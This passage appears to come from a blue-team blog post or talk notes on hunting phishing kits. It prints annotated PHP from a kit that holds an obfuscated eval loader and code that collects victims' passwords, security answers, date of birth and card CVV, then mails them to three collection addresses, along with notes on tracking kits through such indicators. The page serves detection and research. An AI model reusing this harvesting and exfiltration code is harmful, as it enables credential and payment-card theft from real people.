Blue Team
DFIR
Automate all the things
Open Sorcerer
I like long walks through binary trees, #Python & #PowerShell riding, holding hands with Microsoft, writing romantic experiences about code, git prune all the branches, and deep sea #phishing
// Packed loader layer of the kit: the payload is base64-decoded, rot13'd,
// gzinflate'd and rot13'd again before being handed to eval(). The encoded
// blob itself was removed from this page. The fixed call chain
// eval(str_rot13(gzinflate(str_rot13(base64_decode( is the string worth
// matching on when scanning a compromised web root for this family.
eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
// Presumably the unpacked result of the line above — verify by decoding the
// original blob. Everything the victim typed on earlier pages of the kit was
// parked in $_SESSION and is read back here: credentials, three security
// question/answer pairs, date of birth, and card expiry/CVV.
$user = $_SESSION['username'];
$pass = $_SESSION['password'];
$q1= $_SESSION['question1'];
$a1 = $_SESSION['answer1'];
$q2 = $_SESSION['question2'];
$a2 = $_SESSION['answer2'];
$q3 = $_SESSION['question3'];
$a3 = $_SESSION['answer3'];
$dob = $_SESSION['dob'];
$exp = $_SESSION['exp'];
$cvv = $_SESSION['cvv'];
// Victim metadata: HTTP_CLIENT_IP is a request header (so it is whatever
// the client or an intermediate proxy sent) and is preferred over the
// socket peer address when present.
if (getenv('HTTP_CLIENT_IP')){
$ip=getenv('HTTP_CLIENT_IP');}
else {
$ip=getenv('REMOTE_ADDR');}
// Reverse-DNS lookup of the peer address and the raw User-Agent string;
// both end up in the exfiltrated report.
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$browser = $_SERVER['HTTP_USER_AGENT'];
// Report body. The "bmr" / "BMO" banner lines and the field labels are
// constant across victims, which makes them a usable fingerprint for
// clustering samples of this kit and for matching outbound mail in logs.
$data = "---------------------bmr---------------------
User: $user
Pass: $pass
-
Q1 : $q1
A1 : $a1
Q2 : $q2
A2 : $a2
Q3 : $q3
A3 : $a3
dob: $dob
exp: $exp
cvv: $cvv
-
Browser: $browser
IP: $ip
---------------------BMO---------------------
";
// Drop addresses: the three recipients below are the kit operator's
// collection mailboxes and the primary IoCs to extract from this file.
// The subject prefix "Bmer" followed by user#pass# is another constant
// worth carrying into mail-log searches.
$un = "multic62@yandex.com";
$do = "sco314159265395.com";
$tr = "fi5319624@gmail.com";
$subj = "Bmer $user#$pass#";
// Sends only once a username has been captured; each submission produces
// three outbound mail() calls from the hosting server.
if ($_SESSION['username'] != "" ) {
mail($un,$subj,$data);
mail($do,$subj,$data);
mail($tr,$subj,$data);
}
https://media.pitchfork.com/photos/5d66f433ff912900082415fc/2:1/w_790/TeeJay6.png
reduce network communications with the original / cloned site
increase backwards compatibility
And typical confirmation pages for websites require specific images to replicate the user's expected experience.
PhishKit Names & Versions
Email Addresses being used to forward captured content
Logs
Specific hosting providers
WHOIS/RDAP info
Additionally, if you continue to see a phishkit variant over and over, you can track their defensive measures — this also helps to improve your own tooling.
twitter: @MSAdministrator
github: https://github.com/MSAdministrator
p-blog: https://letsautomate.it
w-blog: https://swimlane.com/blog
trawl: https://github.com/swimlane/trawl
slides: https://letsautomate.it/presentations/hunting-for-phishkits.html#/
(slides will be up sometime this week or weekend)